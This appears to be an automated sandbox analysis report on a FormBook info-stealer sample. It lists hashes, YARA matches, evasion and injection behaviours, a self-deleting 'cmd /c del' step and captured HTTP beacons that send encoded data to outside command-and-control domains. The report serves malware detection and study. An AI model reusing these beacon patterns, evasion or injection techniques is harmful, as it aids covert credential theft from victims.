Analysis Report emthree.exe

Overview

General Information

Sample Name: emthree.exe
Analysis ID: 323574
MD5: 25b5788669a3a8f35596ce975f0823a7
SHA1: 77e07883f131f342e3d24954ea348d25554440a1
SHA256: f3024d8a77f7d80b8e1f44a868913ad76e926d5add36cdc27332c42c3cc012a3
Tags: PEP

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • emthree.exe (PID: 4600 cmdline: 'C:\Users\user\Desktop\emthree.exe' MD5: 25B5788669A3A8F35596CE975F0823A7)
    • emthree.exe (PID: 5772 cmdline: {path} MD5: 25B5788669A3A8F35596CE975F0823A7)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6240 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6256 cmdline: /c del 'C:\Users\user\Desktop\emthree.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(18 further entries not shown)

Unpacked PEs

Source: 1.2.emthree.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 1.2.emthree.exe.400000.0.unpack
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 1.2.emthree.exe.400000.0.unpack
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x17629:$sqlite3step: 68 34 1C 7B E1
  • 0x1773c:$sqlite3step: 68 34 1C 7B E1
  • 0x17658:$sqlite3text: 68 38 2A 90 C5
  • 0x1777d:$sqlite3text: 68 38 2A 90 C5
  • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
Source: 1.2.emthree.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 1.2.emthree.exe.400000.0.raw.unpack
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further entry not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: emthree.exe; Avira: detected
Multi AV Scanner detection for submitted file
Source: emthree.exe; Metadefender: Detection: 35%
Source: emthree.exe; ReversingLabs: Detection: 64%
Yara detected FormBook
Source: Yara match; File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: emthree.exe; Joe Sandbox ML: detected
Source: 1.2.emthree.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: global traffic; HTTP traffic detected: GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1 | Host: www.porncamslivechat.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1 | Host: www.amarilloautoexpress.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View; ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View; ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
Source: C:\Windows\explorer.exe; Code function: 2_2_06D527A2 getaddrinfo,setsockopt,recv,
Source: global traffic; HTTP traffic detected: GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1 | Host: www.porncamslivechat.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1 | Host: www.amarilloautoexpress.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown; DNS traffic detected: queries for: www.asojebu.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Nov 2020 05:37:46 GMTServer: ApacheLink: <https://porncamslivechat.com/wp-json/>; rel="https://api.w.org/"Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=1d6c5c8d17388afcc8a5932da9c3f004; path=/Upgrade: h2,h2cConnection: Upgrade, closeReferrer-Policy: no-referrer-when-downgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 32 66 36 38 32 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 
63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 62 66 66 64 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp; String found in binary or memory: http://www.fontbureau.comm
Source: emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp; String found in binary or memory: http://www.fontbureau.comu
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: emthree.exe, 00000000.00000002.238716419.00000000016B0000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_0041A070 NtClose,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_0041A120 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_00419F40 NtCreateFile,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_00419FF0 NtReadFile,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_0041A06B NtClose,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_0041A03A NtReadFile,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_010299A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_010295D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029950 NtQueueApcThread,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_010299D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029820 NtEnumerateKey,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_0102B040 NtSuspendThread,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_010298A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029B00 NtSetValueKey,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_0102A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029A10 NtQuerySection,
Source: C:\Users\user\Desktop\emthree.exe; Code function: 1_2_01029A80 NtOpenDirectoryObject,
